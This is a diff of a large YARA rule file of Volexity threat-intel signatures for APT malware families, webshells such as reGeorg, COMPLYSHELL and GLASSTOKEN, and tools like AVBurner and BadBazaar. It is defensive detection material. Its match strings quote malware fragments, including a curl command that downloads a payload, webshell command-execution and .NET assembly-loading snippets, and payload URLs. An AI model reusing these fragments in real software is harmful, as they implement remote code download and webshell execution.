"https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-02-13 CharmingCypress/rules.yar#L262-L286" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "7ebaff9fddf6491d6b1ed9ab14c1b87dc8df850536e55aa723d625a593b33ed7" + logic_hash = "f4c5f13ac75504b14def9c37d3a41c6eea4c45845d4b54c50030b1f00691e4bf" score = 75 - quality = 53 - tags = "STORMBAMBOO, FILE, MEMORY" - hash1 = "cf5edcff4053e29cb236d3ed1fe06ca93ae6f64f26e25117d68ee130b9bc60c8" - hash2 = "9b71fad3280cf36501fe110e022845b29c1fb1343d5250769eada7c36bc45f70" - hash3 = "623f99cbe20af8b79cbfea7f485d47d3462d927153d24cac4745d7043c15619a" - hash4 = "d599d7814adbab0f1442f5a10074e00f3a776ce183ea924abcd6154f0d068bb4" + quality = 80 + tags = "CHARMINGCYPRESS, FILE" + hash1 = "d6d043973d8843a82033368c785c362f51395b1a1d475fa4705aff3526e15268" + parent_hash = "31ca565dcbf77fec474b6dea07101f4dd6e70c1f58398eff65e2decab53a6f33" os = "all" os_arch = "all" - report1 = "TIB-20231221" - report2 = "TIB-20240227" - scan_context = "file,memory" - severity = "critical" + scan_context = "file" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - rule_id = 6114 - version = 8 + rule_id = 9769 + version = 3 strings: - $magic1 = "curl -o %s http://cgi1.apnic.net/cgi-bin/my-ip.php" fullword ascii - $magic2 = "[FST%d]: WhyUserCancel UNKNOW: %d" fullword ascii - $magic3 = "[FST%d]: wait C2 prepare ready TIMEOUT, fd: %d" fullword ascii - $magic4 = "[FST%d]: wait C2 ack file content TIMEOUT, fd: %d" fullword ascii - $magic5 = "[FST%d]: TIMER_CHECK_CANCEL WhyUserCancel UNKNOW: %d" fullword ascii - $magic6 = "[FST%d]: encrypt file info key=%s, crc v1=0x%p, v2=0x%p" fullword ascii - $s1 = "auto bbbbbaaend:%d path %s" fullword ascii - $s2 = "0keyboardRecirderStopv" fullword ascii - $s3 = "curl begin..." fullword ascii - $s4 = "curl over!" fullword ascii - $s5 = "kAgent fail" fullword ascii - $s6 = "put !!!!" fullword ascii - $s7 = "vret!!!!!! %d" fullword ascii - $s8 = "save Setting Success" fullword ascii - $s9 = "Start Filesyste Search." fullword ascii - $s10 = "./SearchFileTool" fullword ascii - $s11 = "put unknow exception in MonitorQueue" fullword ascii - $s12 = "./netcfg2.ini" fullword ascii - $s13 = ".killchecker_" fullword ascii - $s14 = "./param.ini" fullword ascii + $remote = "remote-cert-tls server" ascii + $ip = "Ip: " + $tls = "<tls_auth>" condition: - any of ($magic*) or 7 of ($s*) + all of them } -import "hash" import "pe" +import "hash" -rule VOLEXITY_Apt_Malware_Macos_Gimmick : STORMBAMBOO FILE MEMORY +rule VOLEXITY_Apt_Delivery_Win_Charming_Openvpn_Client : CHARMINGCYPRESS FILE { meta: - description = "Detects the macOS port of the GIMMICK malware." + description = "Detects a fake OpenVPN client developed by CharmingCypress." author = "threatintel@volexity.com" - id = "3d485788-4aab-511b-a49e-5dc09d1950a9" - date = "2021-10-18" - modified = "2024-08-02" - reference = "https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-08-02 StormBamboo/rules.yar#L113-L171" + id = "b69fdd72-4a55-5e83-b754-401fe9339007" + date = "2023-10-17" + modified = "2023-10-27" + reference = "TIB-20231027" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-02-13 CharmingCypress/rules.yar#L287-L310" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "00fba9df2212874a45d44b3d098a7b76c97fcd53ff083c76b784d2b510a4a467" + logic_hash = "02596a62cb1ba17ecabef0ae93f434e4774b00422a6da2106a2bc4c59d2f8077" score = 75 - quality = 78 - tags = "STORMBAMBOO, FILE, MEMORY" - hash1 = "2a9296ac999e78f6c0bee8aca8bfa4d4638aa30d9c8ccc65124b1cbfc9caab5f" - os = "darwin" + quality = 80 + tags = "CHARMINGCYPRESS, FILE" + hash1 = "2d99755d5cd25f857d6d3aa15631b69f570d20f95c6743574f3d3e3e8765f33c" + os = "win" os_arch = "all" - scan_context = "file,memory" - severity = "critical" + scan_context = "file" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - rule_id = 6022 - version = 8 + rule_id = 9768 + version = 2 strings: - $s1 = "http://cgi1.apnic.net/cgi-bin/my-ip.php --connect-timeout 10 -m 20" wide ascii - $json1 = "base_json" ascii wide - $json2 = "down_json" ascii wide - $json3 = "upload_json" ascii wide - $json4 = "termin_json" ascii wide - $json5 = "request_json" ascii wide - $json6 = "online_json" ascii wide - $json7 = "work_json" ascii wide - $msg1 = "bash_pid: %d, FDS_CHILD: %d, FDS_PARENT: %d" ascii wide - $msg2 = "pid %d is dead" ascii wide - $msg3 = "exit with code %d" ascii wide - $msg4 = "recv signal %d" ascii wide - $cmd1 = "ReadCmdQueue" ascii wide - $cmd2 = "read_cmd_server_timer" ascii wide - $cmd3 = "enableProxys" ascii wide - $cmd4 = "result_block" ascii wide - $cmd5 = "createDirLock" ascii wide - $cmd6 = "proxyLock" ascii wide - $cmd7 = "createDirTmpItem" ascii wide - $cmd8 = "dowfileLock" ascii wide - $cmd9 = "downFileTmpItem" ascii wide - $cmd10 = "filePathTmpItem" ascii wide - $cmd11 = "uploadItems" ascii wide - $cmd12 = "downItems" ascii wide - $cmd13 = "failUploadItems" ascii wide - $cmd14 = "failDownItems" ascii wide - $cmd15 = "downloadCmds" ascii wide - $cmd16 = "uploadFiles" ascii wide - $cmd17 = "bash callback...." ascii wide + $s1 = "DONE!" + $s2 = "AppCore.dll" + $s3 = "ultralight@@" condition: - $s1 or 5 of ($json*) or 3 of ($msg*) or 9 of ($cmd*) + all of ($s*) } -import "hash" import "pe" +import "hash" -rule VOLEXITY_Apt_Malware_Win_Dustpan_Apihashes : STORMBAMBOO FILE +rule VOLEXITY_Apt_Malware_Ps1_Powerstar_Generic : CHARMINGCYPRESS FILE MEMORY { meta: - description = "Detects DUSTPAN malware using API hashes used to resolve functions at runtime." + description = "Detects POWERSTAR modules based on common HTTP functions used across modules." author = "threatintel@volexity.com" - id = "ed275da4-cd95-5fa3-a568-e610fb405bb3" - date = "2023-08-17" - modified = "2024-08-02" + id = "71a3e99d-e1c8-5ac1-abbc-2ba5cba80799" + date = "2023-06-02" + modified = "2023-06-28" reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-08-02 StormBamboo/rules.yar#L173-L210" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-02-13 CharmingCypress/rules.yar#L311-L335" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "3edb66ade428c451c18aa152244f869f9f8c10e62ed942bf722b4d1cf1893e93" + logic_hash = "4da02190ffd16304eccbc0d12dfcc5637a6b785af0e3dc3dfcafcfe114597eb2" score = 75 quality = 80 - tags = "STORMBAMBOO, FILE" - hash1 = "b77bcfb036f5a6a3973fdd68f40c0bd0b19af1246688ca4b1f9db02f2055ef9d" - os = "win" - os_arch = "all" - report1 = "MAR-20230818" - report2 = "TIB-20231221" - scan_context = "file" - severity = "critical" + tags = "CHARMINGCYPRESS, FILE, MEMORY" + scan_context = "file,memory" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - rule_id = 9591 - version = 3 + rule_id = 9356 + version = 2 strings: - $h1 = {9c 5b 9f 0b} - $h2 = {4c 8f 3e 08} - $h3 = {b4 aa f2 06} - $h4 = {dc cb ca 09} - $h5 = {d4 33 07 0e} - $h6 = {27 89 d6 0a} - $h7 = {b5 7d ae 09} - $h8 = {4e 64 eb 0b} - $h9 = {be 17 d9 08} - $magic = "SMHM" + $http1 = "Send_Upload" ascii wide + $http2 = "Send_Post_Data" ascii wide + $json1 = "{\"OS\":\"" ascii wide + $json2 = "{\"ComputerName\":\"' + $env:COMPUTERNAME + '\"}" ascii wide + $json3 = "{\"Token\"" ascii wide + $json4 = "{\"num\":\"" ascii wide condition: - 6 of ($h*) and $magic + all of ($http*) or all of ($json*) } -import "hash" -import "pe" - -rule VOLEXITY_Apt_Malware_Win_Pocostick_Jul23 : STORMBAMBOO FILE MEMORY +rule VOLEXITY_Apt_Webshell_Pl_Complyshell : UTA0178 FILE MEMORY { meta: - description = "Detects the July 2023 POCOSTICK variant. These strings are only visible in memory after several rounds of shellcode decryption." + description = "Detection for the COMPLYSHELL webshell." author = "threatintel@volexity.com" - id = "9632a7fc-06da-58b4-b95c-b46aeb9dd41d" - date = "2023-07-24" - modified = "2024-08-02" - reference = "TIB-20231221" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-08-02 StormBamboo/rules.yar#L212-L241" + id = "6b44b5bc-a75f-573c-b9c3-562b7874e408" + date = "2023-12-13" + modified = "2024-01-09" + reference = "TIB-20231215" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L1-L22" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "19487db733c7f793be2a1287df32a165e46f6af0e940b13b389f4d675b5100c4" + logic_hash = "ff46691f1add20cff30fe996e2fb199ce42408e86d5642a8a43c430f2245b1f5" score = 75 quality = 80 - tags = "STORMBAMBOO, FILE, MEMORY" - hash1 = "ec3e787c369ac4b28447e7cacc44d70a595e39d47f842bacb07d19b12cab6aad" - os = "win" + tags = "UTA0178, FILE, MEMORY" + hash1 = "8bc8f4da98ee05c9d403d2cb76097818de0b524d90bea8ed846615e42cb031d2" + os = "linux" os_arch = "all" scan_context = "file,memory" - severity = "critical" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - rule_id = 9542 - version = 3 + rule_id = 9995 + version = 4 strings: - $str1 = "Folder PATH listing form volume" wide - $str2 = "Volume serial number is 0000-1111" wide - $str3 = "Type:Error" wide - $str4 = "Type:Desktop" wide - $str5 = "Type:Laptop" wide - $str6 = "Type:Vitual" wide - $str7 = ".unicode.tmp" wide - $str8 = "EveryOne" wide + $s = "eval{my $c=Crypt::RC4->new(" condition: - 6 of them + $s } -import "hash" -import "pe" - -rule VOLEXITY_Apt_Malware_Py_Dustpan_Pyloader : STORMBAMBOO FILE MEMORY +rule VOLEXITY_Apt_Webshell_Aspx_Glasstoken : UTA0178 FILE MEMORY { meta: - description = "Detects Python script used by KPlayer to update, modified by attackers to download a malicious payload." + description = "Detection for a custom webshell seen on external facing server. The webshell contains two functions, the first is to act as a Tunnel, using code borrowed from reGeorg, the second is custom code to execute arbitrary .NET code." author = "threatintel@volexity.com" - id = "446d2eef-c60a-50ed-9ff1-df86b6210dff" - date = "2023-07-21" - modified = "2024-08-02" - reference = "TIB-20231221" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-08-02 StormBamboo/rules.yar#L243-L279" + id = "5d96294c-aa61-5752-ab06-d5b27f6ac3a1" + date = "2023-12-12" + modified = "2024-01-09" + reference = "TIB-20231215" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L24-L49" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "bb3a70dad28181534e27abbbd618165652c137264bfd3726ae4480c642493a3b" + logic_hash = "34844dc2ba4b18b25dcb5b14b7b80ec655595c9638600a0f2a6367610c542dd1" score = 75 quality = 80 - tags = "STORMBAMBOO, FILE, MEMORY" - os = "all" + tags = "UTA0178, FILE, MEMORY" + hash1 = "26cbb54b1feb75fe008e36285334d747428f80aacdb57badf294e597f3e9430d" + os = "win" os_arch = "all" scan_context = "file,memory" - severity = "critical" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - rule_id = 9530 - version = 4 + rule_id = 9994 + version = 5 strings: - $s_1 = "def count_md5(src)" - $s_2 = "urllib.request.urlretrieve(image_url,main)" - $s_3 = "m1 != '4c8a326899272d2fe30e818181f6f67f'" - $s_4 = "os.path.split(os.path.realpath(__file__))[0]" - $s_5 = "r_v = os.system('curl '+ini_url+cc)" - $s_6 = "b41ef5f591226a0d5adce99cb2e629d8" - $s_7 = "1df495e7c85e59ad0de1b9e50912f8d0" - $s_8 = "tasklist | findstr mediainfo.exe" - $url_1 = "http://dl1.5kplayer.com/youtube/youtube_dl.png" - $url_2 = "http://dl1.5kplayer.com/youtube/youtube.ini?fire=" - $path_1 = "C:\\\\ProgramData\\\\Digiarty\\\\mediainfo.exe" + $s1 = "=Convert.FromBase64String(System.Text.Encoding.Default.GetString(" ascii + $re = /Assembly\.Load\(errors\)\.CreateInstance\("[a-z0-9A-Z]{4,12}"\).GetHashCode\(\);/ condition: - 3 of ($s_*) or any of ($url_*) or $path_1 + for any i in (0..#s1) : ($re in (@s1[i]..@s1[i]+512)) } -import "hash" -import "pe" - -rule VOLEXITY_Apt_Malware_Win_Pocostick_B : STORMBAMBOO FILE +rule VOLEXITY_Webshell_Aspx_Regeorg : FILE MEMORY { meta: - description = "Detects the POCOSTICK family, variant B." + description = "Detects the reGeorg webshell based on common strings in the webshell. May also detect other webshells which borrow code from ReGeorg." author = "threatintel@volexity.com" - id = "2a8a455d-6b5c-53a7-aa5e-91d29efd3aa8" - date = "2020-07-08" - modified = "2024-08-02" - reference = "TIB-20231221" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-08-02 StormBamboo/rules.yar#L281-L312" + id = "02365a30-769e-5c47-8d36-a79608ffd121" + date = "2018-08-29" + modified = "2024-01-09" + reference = "TIB-20231215" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L51-L83" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - hash = "1e81fb62cb57a3231642f66fee3e10d28a7c81637e4d6a03515f5b95654da585" - logic_hash = "a51e836425ec407706c7b2a4c21cc12398620c7dae6c9504a855f99e4b4d6ab2" + hash = "9d901f1a494ffa98d967ee6ee30a46402c12a807ce425d5f51252eb69941d988" + logic_hash = "4fed023e85a32052917f6db1e2e155c91586538938c03acc59f200a8264888ca" score = 75 quality = 80 - tags = "STORMBAMBOO, FILE" + tags = "FILE, MEMORY" os = "win" os_arch = "all" - scan_context = "file" - severity = "critical" + scan_context = "file,memory" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - rule_id = 1678 - version = 6 + rule_id = 410 + version = 7 strings: - $a1 = "AVCAesUtil@@" ascii - $a2 = "AVencrypt_base@@" ascii - $a3 = "AVCCmdTarget@@" ascii - $a4 = "AVCWinThread@@" ascii + $a1 = "every office needs a tool like Georg" ascii + $a2 = "cmd = Request.QueryString.Get(\"cmd\")" ascii + $a3 = "exKak.Message" ascii + $proxy1 = "if (rkey != \"Content-Length\" && rkey != \"Transfer-Encoding\")" + $proxy_b1 = "StreamReader repBody = new StreamReader(response.GetResponseStream(), Encoding.GetEncoding(\"UTF-8\"));" ascii + $proxy_b2 = "string rbody = repBody.ReadToEnd();" ascii + $proxy_b3 = "Response.AddHeader(\"Content-Length\", rbody.Length.ToString());" ascii condition: - all of ($a*) or for any resource in pe.resources : (hash.sha256(resource.offset,resource.length)=="b098afd3657b956edbace77499e5e20414ab595a17ffc437b9dadc791eff1cfa" or hash.sha256(resource.offset,resource.length)=="2e53e960d45d657d8ba9929f6c8b34e90b2ae15b879768099474678dd1864f3b") + any of ($a*) or $proxy1 or all of ($proxy_b*) } -import "hash" -import "pe" - -rule VOLEXITY_Apt_Malware_Elf_Catchdns_Aug20_Memory : DRIFTINGBAMBOO FILE MEMORY +rule VOLEXITY_Hacktool_Py_Pysoxy : FILE MEMORY { meta: - description = "Looks for strings from CatchDNS component used to intercept and modify DNS responses, and likely also intercept/monitor http. This rule would only match against memory in the example file analyzed by Volexity." + description = "SOCKS5 proxy tool used to relay connections." author = "threatintel@volexity.com" - id = "95306735-cdae-5407-ad49-d465d245378d" - date = "2020-08-20" - modified = "2024-08-02" - reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-08-02 StormBamboo/rules.yar#L313-L387" + id = "88094b55-784d-5245-9c40-b1eebf0e6e72" + date = "2024-01-09" + modified = "2024-01-09" + reference = "TIB-20240109" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L85-L111" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - hash = "4f3d35f4f8b810362cbd4c59bfe5a961e559fe5713c9478294ccb3af2d306515" - logic_hash = "a7d677d7eecf388df7e7c2343fd3e46188594473c01075bf8a0b54292a51db94" + logic_hash = "f73e9d3c2f64c013218469209f3b69fc868efafc151a7de979dde089bfdb24b2" score = 75 - quality = 55 - tags = "DRIFTINGBAMBOO, FILE, MEMORY" - os = "linux" + quality = 80 + tags = "FILE, MEMORY" + hash1 = "e192932d834292478c9b1032543c53edfc2b252fdf7e27e4c438f4b249544eeb" + os = "all" os_arch = "all" - report1 = "MAR-20221222" - report2 = "TIB-20231221" scan_context = "file,memory" - severity = "critical" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - rule_id = 227 - version = 10 + rule_id = 10065 + version = 3 strings: - $os1 = "current thread policy=%d" ascii wide - $os2 = "OS_CreatShareMem %s-->%x" ascii wide - $os3 = "sem_open fail" ascii wide - $os4 = "int OS_GetCurRunPath(char*, int)" ascii wide - $os5 = "int OS_GetCurModName(char*, int)" ascii wide - $os6 = "int OS_StrToTime(char*, time_t*)" ascii wide - $os7 = "int OS_TimeToStr(time_t, char*)" ascii wide - $os8 = "int OS_TimeToStrYearMothDay(time_t, char*)" ascii wide - $os9 = "bool OS_Access(const char*)" ascii wide - $os10 = "int OS_Memicmp(const void*, const void*, unsigned int)" ascii wide - $os11 = "int OS_Mkdir(char*)" ascii wide - $os12 = "OS_ConnectSem" ascii wide - $msg1 = "client: last send packet iseq: %x, the ack :%x" ascii wide - $msg2 = "server: last send packet iseq: %x, the iseq :%x" ascii wide - $msg3 = "send packet failed!" ascii wide - $msg4 = "will hijack dns:%s, ip:%s " ascii wide - $msg5 = "dns send ok:%s" ascii wide - $msg6 = "tcp send ok" ascii wide - $msg7 = "FilePath:%s;" ascii wide - $msg8 = "Line:%d,Fun:%s,ErrorCode:%u;" ascii wide - $msg9 = "Description:%s;" ascii wide - $msg10 = "Line:%d,Fun:%s,ErrorCode:%u;" ascii wide - $msg11 = "get msg from ini is error" ascii wide - $msg12 = "on build eth send_msg or payload is null" ascii wide - $msg13 = "on build udp send_msg or payload is null" ascii wide - $conf1 = "%d.%d.%d.%d" ascii wide - $conf2 = "%s.tty" ascii wide - $conf3 = "dns.ini" ascii wide - $netw1 = "LISTEN_DEV" ascii wide - $netw2 = "SEND_DEV" ascii wide - $netw3 = "SERVER_IP" ascii wide - $netw4 = "DNSDomain" ascii wide - $netw5 = "IpLimit" ascii wide - $netw6 = "HttpConfig" ascii wide - $netw7 = "buildhead" ascii wide - $netw8 = "sendlimit" ascii wide - $netw9 = "content-type" ascii wide - $netw10 = "otherhead_" ascii wide - $netw11 = "configfile" ascii wide - $apache = {48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D 0A 53 65 72 76 65 72 3A 20 41 70 61 63 68 65 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 25 73 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 25 64 0D 0A} - $cpp1 = "src/os.cpp" - $cpp2 = "src/test_catch_dns.cpp" + $s1 = "proxy_loop" ascii + $s2 = "connect_to_dst" ascii + $s3 = "request_client" ascii + $s4 = "subnegotiation_client" ascii + $s5 = "bind_port" ascii condition: - 9 of ($os*) or 3 of ($msg*) or all of ($conf*) or all of ($netw*) or $apache or all of ($cpp*) + all of them } rule VOLEXITY_Apt_Win_Powerstar_Persistence_Batch : CHARMINGKITTEN { @@ -203049,6 +204216,184 @@ rule VOLEXITY_Apt_Win_Powerstar : CHARMINGKITTEN condition: $appname or all of ($langfilters*) or all of ($definitions*) or $sess } +rule VOLEXITY_Apt_Win_Avburner : SNAKECHARMER +{ + meta: + description = "Detects AVBurner based on a combination of API calls used, hard-coded strings and bytecode patterns." + author = "threatintel@volexity.com" + id = "1bde0861-4820-5bb1-98a3-516092c91be0" + date = "2023-01-02" + modified = "2023-03-07" + reference = "https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2023/2023-03-07 AVBurner/yara.yar#L1-L36" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + hash = "4b1b1a1293ccd2c0fd51075de9376ebb55ab64972da785153fcb0a4eb523a5eb" + logic_hash = "56ff6c8a4b737959a1219699a0457de1f0c34fead4299033840fb23c56a0caad" + score = 75 + quality = 80 + tags = "SNAKECHARMER" + memory_suitable = 1 + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + + strings: + $api1 = "PspCreateProcessNotifyRoutineAddress" wide + $api2 = "PspCreateThreadNotifyRoutineAddress" wide + $api3 = "PspLoadImageNotifyRoutineAddress" wide + $str1 = "\\\\.\\RTCORE64" wide + $str2 = "\\\\%ws/pipe/%ws" wide + $str3 = "CreateServerW Failed %u" wide + $str4 = "OpenSCManager Failed %u" wide + $str5 = "Get patternAddress" wide + $pattern1 = { 4C 8B F9 48 8D 0C C1 E8 } + $pattern2 = { 48 8D 0C DD 00 00 00 00 45 33 C0 49 03 CD 48 8B } + $pattern3 = { 48 8D 04 C1 48 89 45 70 48 8B C8 E8 } + $pattern4 = { 49 8D 0C FC 45 33 C0 48 8B D6 E8 00 00 00 00 00} + $pattern5 = { 45 33 C0 48 8D 0C D9 48 8B D7 E8 00 00 00 00 00 00 00 00 00 00 00 00 00 } + $pattern6 = { 41 0F BA 6D 00 0A BB 01 00 00 00 4C 8B F2 4C 8B F9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 } + + condition: + all of ($api*) or all of ($str*) or all of ($pattern*) +} +rule VOLEXITY_Apt_Malware_Apk_Badbazaar_Common_Certificate : EVILBAMBOO FILE +{ + meta: + description = "Detection of the common.cer file used for a large BADBAZAAR malware cluster for its certificate pinning for the C2 communication." + author = "threatintel@volexity.com" + id = "5a033770-7ad3-5c79-90ac-b1e3fff6b5f0" + date = "2023-06-01" + modified = "2023-06-13" + reference = "https://github.com/volexity/threat-intel" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L230-L255" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + logic_hash = "861d4e1c40847c6ade04eddb047370d645afea6d5c16d55155fa58a16111c39e" + score = 75 + quality = 80 + tags = "EVILBAMBOO, FILE" + hash1 = "6aefc2b33e23f6e3c96de51d07f7123bd23ff951d67849a9bd32d446e76fb405" + scan_context = "file" + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + + strings: + $b1 = {30 82 03 61 30 82 02 49 a0 03 02 01 02 02 04 2b 6e df 67 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b} + $s1 = "california1" + $s2 = "los1" + $s3 = "tech1" + $s4 = "common1" + $s5 = "common0" + $s6 = "220401234506Z" + $s7 = "470326234506Z0a1" + + condition: + $b1 at 0 or all of ($s*) +} +rule VOLEXITY_Apt_Malware_Apk_Badbazaar_Stage2_Implant_May23 : EVILBAMBOO FILE +{ + meta: + description = "Detection of the second stage capability of the BadBazaar android malware that has the main malicious capabilities. Will gather various info about the user/phone and routinely send this to the C2." + author = "threatintel@volexity.com" + id = "1f97c610-773f-5385-935a-445cb9192157" + date = "2023-05-25" + modified = "2023-08-30" + reference = "https://github.com/volexity/threat-intel" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L257-L285" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + logic_hash = "2186369298ebfa0b892ecb14ebacc93c6d14c9c35012e8e6cdff077634cf3773" + score = 75 + quality = 80 + tags = "EVILBAMBOO, FILE" + hash1 = "bf5f7fbf42236e89bcf663d2822d54bee89abaf3f247a54f371bf156e0e03629" + scan_context = "file" + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + + strings: + $c1 = "%{\"command\":\"%s\",\"path\":\"%s\",\"files\":[" + $c2 = "{\"name\":\"%s\",\"dirs\":\"%d\",\"files\":\"%d\",\"isfolder\":\"%d\",\"path\":\"%s\"}," + $s1 = "Timezon id:" + $s2 = "China Telecom" + $s3 = "China Unicom" + $s4 = "ConfigPipe" + $s5 = "ForwordTo" + $s6 = "can't get camera content" + $s7 = "cat /sys/class/net/wlan0/address" + $s8 = "_preferences_light" + $s9 = "registration_jid" + + condition: + 1 of ($c*) or 5 of ($s*) +} +rule VOLEXITY_Apt_Delivery_Web_Js_Jmask_Str_Array_Variant : EVILBAMBOO FILE +{ + meta: + description = "Detects the JMASK profiling script in an obfuscated format using a string array and an offset." + author = "threatintel@volexity.com" + id = "d5d32c8b-53fb-5103-ac73-05f320e71c97" + date = "2023-06-27" + modified = "2023-09-21" + reference = "https://github.com/volexity/threat-intel" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L408-L444" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + logic_hash = "0ae7c96e0f866f21d66d7a23bf937d6ce48c9dd1ea19142dbb13487208780146" + score = 75 + quality = 80 + tags = "EVILBAMBOO, FILE" + hash1 = "7995c382263f8dbbfc37a9d62392aef8b4f89357d436b3dd94dea842f9574ecf" + scan_context = "file" + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + + strings: + $array_1 = "http://eular.github.io" + $array_2 = "stun:stun.services.mozilla.com" + $array_3 = "\xE6\x9C\xAA\xE5\xAE\x89\xE8\xA3\x85MetaMask" + $array_4 = "/jquery/jquery.min.js" + $array_5 = "onicecandidate" + $ios_1 = "['a7', '640x1136', [_0x" + $ios_2 = "['a7', _0x" + $ios_3 = "['a8', _0x" + $ios_4 = "['a8', '750x1334', ['iPhone\\x206']]" + $ios_5 = "['a8', '1242x2208', ['iPhone\\x206\\x20Plus']]" + $ios_6 = "['a8', _0x" + $ios_7 = "['a9', _0x" + $ios_8 = "['a9', '750x1334', [_0x" + $ios_9 = "['a9', '1242x2208', ['iPhone\\x206s\\x20Plus']]" + $ios_10 = "['a9x', '2048x2732', ['iPad\\x20Pro\\x20(1st\\x20gen\\x2012.9-inch)']]" + $ios_11 = "['a10x', '1668x2224', [_0x" + $header = "info = {}, finished = 0x0;" + + condition: + 3 of ($array_*) or 5 of ($ios_*) or $header +} +rule VOLEXITY_Apt_Delivery_Web_Js_Jmask : EVILBAMBOO FILE +{ + meta: + description = "Detects the JMASK profiling script in its minified // obfuscated format." + author = "threatintel@volexity.com" + id = "a7b653e1-f7c6-56cc-ab99-3de91d29ef3b" + date = "2023-06-15" + modified = "2023-09-21" + reference = "https://github.com/volexity/threat-intel" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L446-L472" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + logic_hash = "64315ac05049954d36297a616a25ffdd7ce81c6313c0878d5ba4082da24c21bb" + score = 75 + quality = 80 + tags = "EVILBAMBOO, FILE" + hash1 = "efea95720853e0cd2d9d4e93a64a726cfe17efea7b17af7c4ae6d3a6acae5b30" + scan_context = "file" + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + + strings: + $rev0 = "oi.buhtig.ralue//:ptth" ascii + $rev1 = "lairA' xp41" ascii + $rev2 = "dnuof ton ksaMateM" ascii + 